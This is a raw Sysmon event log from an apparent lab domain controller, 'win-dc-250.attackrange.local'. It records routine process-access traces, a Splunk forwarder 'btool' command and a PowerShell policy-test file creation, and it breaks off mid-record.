 10341000x80000000000000001814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.259{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.259{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.259{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.259{08A6967A-4288-6000-1000-000000009A01}11362392C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.259{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429A-6000-4B00-000000009A01}2920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.259{08A6967A-4299-6000-4300-000000009A01}39923996C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-429A-6000-4B00-000000009A01}2920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.271{08A6967A-429A-6000-4B00-000000009A01}2920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4299-6000-4300-000000009A01}3992C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.259{08A6967A-4298-6000-3300-000000009A01}28123160C:\Windows\system32\DFSRs.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d839d|C:\Windows\system32\DFSRs.exe+c0dd|C:\Windows\system32\DFSRs.exe+50e1|C:\Windows\system32\DFSRs.exe+72d2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.228{08A6967A-4299-6000-4900-000000009A01}36963788C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.181{08A6967A-4299-6000-4A00-000000009A01}37403676C:\Windows\system32\wbem\wmiprvse.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\combase.dll+a7962|C:\Windows\System32\combase.dll+a828e|C:\Windows\System32\combase.dll+a804f|C:\Windows\System32\combase.dll+46808|C:\Windows\System32\combase.dll+46420|C:\Windows\System32\combase.dll+54157|C:\Windows\System32\combase.dll+c1b04|C:\Windows\System32\combase.dll+521d1|C:\Windows\System32\combase.dll+52720|C:\Windows\System32\combase.dll+1fca|C:\Windows\System32\RPCRT4.dll+d97da|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 11241100x80000000000000001795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.181{08A6967A-4299-6000-3C00-000000009A01}3792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_l4kuo10f.awy.ps12021-01-14 13:09:46.181 10341000x80000000000000001794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.165{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.165{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.165{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.165{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.165{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 